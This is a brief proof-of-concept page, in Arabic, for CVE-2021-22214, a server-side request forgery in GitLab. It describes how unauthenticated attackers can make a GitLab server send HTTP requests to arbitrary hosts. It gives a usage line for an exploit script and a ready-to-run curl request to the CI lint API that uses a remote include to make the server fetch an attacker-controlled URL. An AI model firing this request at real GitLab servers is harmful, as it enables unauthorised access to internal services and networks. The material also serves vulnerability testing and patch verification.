
إثبات مفهوم لاستغلال CVE-2021-22214، وهو تزوير طلب من جانب الخادم (SSRF) في خطافات الويب الخاصة بـ GitLab، مما يسمح للمهاجمين غير المصادق عليهم بإرسال طلبات HTTP داخلية.
POC لـ CVE-2021-22214: Gitlab SSRF
يحتوي تثبيت GitLab البعيد على ثغرة تزوير الطلبات من جانب الخادم (SSRF) نتيجة لتمكين الشبكة الداخلية لـ webhooks. يمكن لمهاجم بعيد غير مصادق استغلال مثيل GitLab محدود التسجيل مما يتسبب في إرسال طلبات HTTP إلى نطاق عشوائي من اختيار المهاجم.
usage: python3 GitLab_SSRF.py <target> <burp_collaborator_url>
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}'